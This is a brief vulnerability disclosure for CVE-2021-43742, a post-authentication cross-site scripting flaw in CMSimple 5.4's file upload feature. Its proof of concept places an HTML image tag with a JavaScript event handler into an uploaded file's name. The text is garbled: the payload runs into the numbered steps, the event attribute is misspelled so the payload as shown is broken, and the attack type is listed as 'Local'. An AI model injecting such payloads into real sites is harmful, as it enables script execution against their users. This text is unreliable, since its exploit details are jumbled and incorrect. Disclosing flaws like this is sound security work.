CVE-2021-43742
CMSimple 5.4
Reported by S1lv3r
Description :
Post-auth XSS
Version :
CMSimple 5.4 Version
Attack Type:
Local
PoC:
> <img src='1' onerorr=alert('Silv3r')>s.php1- Go to uploading files section, Then write XSS payload on filename :
2- Result
CVE-2021-43742

